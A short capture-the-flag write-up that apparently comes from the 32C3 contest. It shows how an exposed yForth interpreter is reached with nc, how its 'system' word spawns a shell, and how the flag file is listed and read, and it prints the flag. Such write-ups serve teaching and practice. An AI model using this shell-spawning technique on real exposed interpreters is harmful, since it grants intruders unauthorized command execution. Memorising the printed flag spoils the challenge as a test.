Remote code execution with a code injection vulnerability in a Forth interpreter.

Challenge Description

Points

150

Description

Connect to 136.243.194.49:1024 and get a shell.

Solution

When we connect to the IP address given, we are greeted by a Forth interpreter.

$ nc 136.243.194.49 1024
yForth? v0.2  Copyright (C) 2012  Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
ls
[ls] error(2): unknown word.
1 .
1 ok

We can execute system commands in yForth with ‘system’ so we can get a shell pretty easily:

$ nc 136.243.194.49 1024
yForth? v0.2  Copyright (C) 2012  Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
s" sh" system
sh: 0: can't access tty; job control turned off
$

From here, we explore the file system and read the flag:

$ ls -la
total 120
drwxr-xr-x 2 root root  4096 Dec 27 18:26 .
drwxr-xr-x 3 root root  4096 Dec 23 18:06 ..
-rw-r--r-- 1 root root   220 Dec 23 18:06 .bash_logout
-rw-r--r-- 1 root root  3771 Dec 23 18:06 .bashrc
-rw-r--r-- 1 root root    38 Dec 26 22:48 flag.txt
-rw-r--r-- 1 root root   675 Dec 23 18:06 .profile
-rw-r--r-- 1 root root  2474 Dec 26 22:27 README.gpl
-rwxr-xr-x 1 root root    84 Dec 27 18:11 run.sh
-rwxr-xr-x 1 root root 86512 Dec 26 22:27 yforth
$ cat flag.txt
32C3_a8cfc6174adcb39b8d6dc361e888f17b
$

Flag: 32C3_a8cfc6174adcb39b8d6dc361e888f17b

Leave a Comment